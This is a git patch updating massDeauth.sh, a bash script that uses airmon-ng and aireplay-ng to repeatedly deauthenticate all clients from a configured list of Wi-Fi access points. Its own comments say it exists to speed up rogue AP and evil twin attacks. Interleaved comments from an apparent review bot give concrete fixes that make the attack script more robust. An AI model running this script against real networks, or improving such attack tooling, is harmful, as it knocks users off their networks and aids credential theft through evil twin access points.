From 3751a3eadfffe80d34c531c8d24284624ab8c7ca Mon Sep 17 00:00:00 2001 From: Mariusz B Date: Tue, 13 Feb 2018 16:06:37 +0100 Subject: [PATCH] Updated massDeauth.sh script. --- networks/wpa2-enterprise-utils/config.txt | 6 +- networks/wpa2-enterprise-utils/massDeauth.sh | 68 +++++++++++--------- 2 files changed, 41 insertions(+), 33 deletions(-) diff --git a/networks/wpa2-enterprise-utils/config.txt b/networks/wpa2-enterprise-utils/config.txt index c4306c3..419deff 100644 --- a/networks/wpa2-enterprise-utils/config.txt +++ b/networks/wpa2-enterprise-utils/config.txt @@ -9,6 +9,6 @@ retry = 3 # Here comes a list of APs to attack. The list entry form is following: # target = -target = test 00:11:22:33:44:55 14 -target = test2 00:11:22:33:44:55 14 -target = test3 00:11:22:33:44:55 14 +target = SomeAP 00:11:22:33:44:55 1 +target = OtherAP 00:11:22:33:44:55 2 +target = AnotherAP 00:11:22:33:44:55 3 diff --git a/networks/wpa2-enterprise-utils/massDeauth.sh b/networks/wpa2-enterprise-utils/massDeauth.sh index 306f1de..dd11501 100755 --- a/networks/wpa2-enterprise-utils/massDeauth.sh +++ b/networks/wpa2-enterprise-utils/massDeauth.sh 
@@ -1,32 +1,9 @@ #!/bin/bash # -# Simple script intended to perform mass-deauthentication of -# any associated&authenticated client to the Access-Point. -# Helpful to actively speed up Rogue AP/Evil Twin attacks in -# multiple Access-Points within an ESSID environments. -# -# In other words, if you have an ESSID set up from many -# access-points (BSSIDs) - this script will help you -# deauthenitcate all clients from those APs iteratively. -# -# Expected config file must obey the following format: -# ----------------------------------------------- -# # Specify an interface -# iface = wlp4s0 -# -# # Number of deauths -# deauths = 3 -# -# # Retry deauths, 0 - infinity -# retry = 3 -# -# # Here comes a list of APs to attack. The list entry form is following: -# # target = -# target = test 00:11:22:33:44:55 14 -# target = test2 00:11:22:33:44:55 14 -# target = test3 00:11:22:33:44:55 14 -# ----------------------------------------------- +# This is a massive WLAN deauthentication attacking script +# that takes as input list of APs against which should deauth be launched, +# and then attempts that attack. # # Mariusz B. / mgeeky '18, # @@ -36,6 +13,11 @@ if [ $# -ne 1 ]; then exit 1 fi +if [ $EUID -ne 0 ]; then + echo "[!] This script must be launched as root." + exit 1 +fi + function deauthClients { echo -e "\tDeauthing clients in AP: $essid / $bssid, $ch" iface=$1 
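Review bot: The replacement header comment removes the only in-script description of the config file format and does not say where it now lives, so a reader of massDeauth.sh can no longer tell what the single argument must contain. A pointer such as `# Config format (iface, deauths, retry, target lines): see config.txt in this directory.` would restore that. In the added root check, `$EUID` is unquoted and the error is written to stdout; `if [ "$EUID" -ne 0 ]; then` with `echo "[!] This script must be launched as root." >&2` keeps diagnostics on stderr. deauthClients starts in this hunk and its body continues outside it.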
@@ -44,33 +26,59 @@ function deauthClients { ch=$4 deauths=$5 - airmon-ng stop $iface @> /dev/null + airmon-ng stop ${iface}mon @> /dev/null + sleep 2 echo -e "\t[1] Starting monitor on channel $ch" airmon-ng start $iface $ch @> /dev/null + sleep 3 + if [ -z "$(ls /sys/class/net | paste | grep ${iface}mon)" ]; then + echo "[!] Could not start monitor interface! Will try again..." + sleep 3 + return + fi + echo -e "\t[2] Deauthing $deauths number of times..." - aireplay-ng --deauth $deauths -a $essid $iface + aireplay-ng --deauth $deauths -e $essid -a $bssid ${iface}mon } config=$(cat $1 | grep -vE '^#') retry=$(echo "$config" | grep retry | cut -d= -f2 | cut -d' ' -f2-) -deauths=$(echo "$config" | grep deauths | cut -d= -f2 | cut -d' ' -f2-) +deauths=$(echo "$config" | grep 'deauths' | grep '=' | awk '{print $3}') iface=$(echo "$config" | grep iface | cut -d= -f2 | cut -d' ' -f2-) echo "Using interface: $iface" +echo "Retry count: $retry" +echo "Deauths to be sent: $deauths" + +if [ -n "$(ps -eF | grep -v grep | grep airodump)" ]; then + echo "[!] Airodump-ng is running: will not stick to one channel." + echo "[!] Please kill airodump-ng first, then proceed further." + exit 1 +fi -IFS=$'\n' if [ $retry -eq 0 ]; then retry=99999999 fi +IFS=$'\n' for i in $(seq 0 $retry); do echo -e "\n[$i] Deauthing clients..." for line in $(echo "$config" | grep 'target' | cut -d= -f2 | cut -d' ' -f2-); do essid=$(echo "$line" | awk '{print $1}') bssid=$(echo "$line" | awk '{print $2}') ch=$(echo "$line" | awk '{print $3}') + + if [ -z $ch ]; then + echo "[!] You must specify for ESSID: $essid" + exit 1 + fi + + if [ -z $bssid ]; then + echo "[!] You must specify for ESSID: $essid" + exit 1 + fi deauthClients $iface $essid $bssid $ch $deauths done
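Review bot: `@>` is not a bash redirection operator, so the rewritten `airmon-ng stop ${iface}mon @> /dev/null` (and the unchanged `airmon-ng start $iface $ch @> /dev/null`) passes a literal `@` argument and leaves stderr unsilenced; `> /dev/null 2>&1` is presumably what was meant. The new monitor check `ls /sys/class/net | paste | grep ${iface}mon` is a substring match, and with an empty `$iface` it succeeds for any interface whose name contains `mon`; `if [ ! -d "/sys/class/net/${iface}mon" ]; then` tests the exact name without parsing `ls`. The config-derived values (`$iface`, `$essid`, `$bssid`, `$ch`, `$deauths`, `$retry`) are expanded unquoted into command lines and into `[ -z $ch ]`, and the new `awk '{print $3}'` parse of `deauths` returns an empty string for `deauths=3` written without spaces, unlike the `cut`-based parsing kept for `retry` and `iface`. Quoting these expansions and rejecting empty or non-numeric `retry`/`deauths` before the loop would make a malformed config fail early instead of mid-run. The outer `for` loop continues outside the hunk.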